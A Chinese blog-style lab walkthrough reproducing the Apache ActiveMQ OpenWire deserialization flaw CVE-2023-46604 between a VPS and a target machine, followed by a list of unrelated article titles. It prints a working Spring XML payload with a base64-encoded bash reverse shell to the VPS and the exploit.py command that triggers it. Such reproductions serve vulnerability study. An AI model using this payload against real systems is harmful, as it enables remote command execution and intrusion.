当前位置：首页 > news >正文

ActiveMQ-CVE-2023-46604

news 2025/7/9 6:34:27

Apache ActiveMQ OpenWire 协议反序列化命令执行漏洞

OpenWire协议在ActiveMQ中被用于多语言客户端与服务端通信。在Apache ActvieMQ5.18.2版本以及以前，OpenWire协议通信过程中存在一处反序列化漏洞，该漏洞可以允许具有网络访问权限的远程攻击者通过操作OpenWire协议中的序列化类型，导致代理的类路径上任何类实例化，从而执行任意命令。

143为VPS

131为靶机

复现

先将poc移动到VPS /var/www/html目录下

开启http服务

攻击机执行命令

成功

利用反弹shell

将xml改成反弹shell

<?xml version="1.0" encoding="UTF-8" ?>

<beans xmlns="http://www.springframework.org/schema/beans"

xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"

xsi:schemaLocation="http://www.springframework.org/schema/beans

http://www.springframework.org/schema/beans/spring-beans.xsd">

<bean id="pb" class="java.lang.ProcessBuilder" init-method="start">

<constructor-arg>

<list>

<value>bash</value>

<value>-c</value>

<value>{echo, YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjYyLjE0My8zMTAwNSAwPiYx}|{base64,-d}|{bash,-i}</value>

</list>

</constructor-arg>

</bean>

</beans>

nc和http同时开启

攻击机执行命令

python exploit.py -i 192.168.62.131 -u http://192.168.62.143:8000/poc.xml

http://www.lryc.cn/news/399621.html

相关文章：

TensorBoard ，PIL 和 OpenCV 在深度学习中的应用

【超音速专利 CN117576413A】基于全连接网络分类模型的AI涂布抓边处理方法及系统

iPhone数据恢复篇：iPhone 数据恢复软件有哪些

Html5+Css3学习笔记

WPF学习(2) -- 样式基础

独家揭秘！五大内网穿透神器，访问你的私有服务

Ubuntu 编译和运行ZLMediaKit

基于JavaSpringBoot+Vue+uniapp微信小程序校园宿舍管理系统设计与实现

Hive的基本操作（创建与修改）

Linux开发讲课37--- ARM的22个常用概念

7-1、2、3 IPFS介绍使用及浏览器交互（react+区块链实战）

CentOS 7 中出现 cannot open Packages database in /var/lib/rpm 错误

【java深入学习第6章】深入解析Spring事件监听机制

Flask与Celery实现Python调度服务

Eureka应用场景和优势

prompt第三讲-PromptTemplate

卷积神经网络图像识别车辆类型

【接口设计】用 Swagger 实现接口文档

TensorFlow系列：第四讲：MobileNetV2实战

Redis+Caffeine 实现两级缓存实战

SpringBoot：SpringBoot中如何实现对Http接口进行监控

STM32-I2C硬件外设

暑假第一次作业

【算法专题】快速排序

debian 12 PXE Server 批量部署系统

【Pytorch】RNN for Image Classification

基于Java的飞机大战游戏的设计与实现论文

初识影刀：EXCEL根据部门筛选低值易耗品

nginx的四层负载均衡实战

中职网络安全B模块Cenots6.8数据库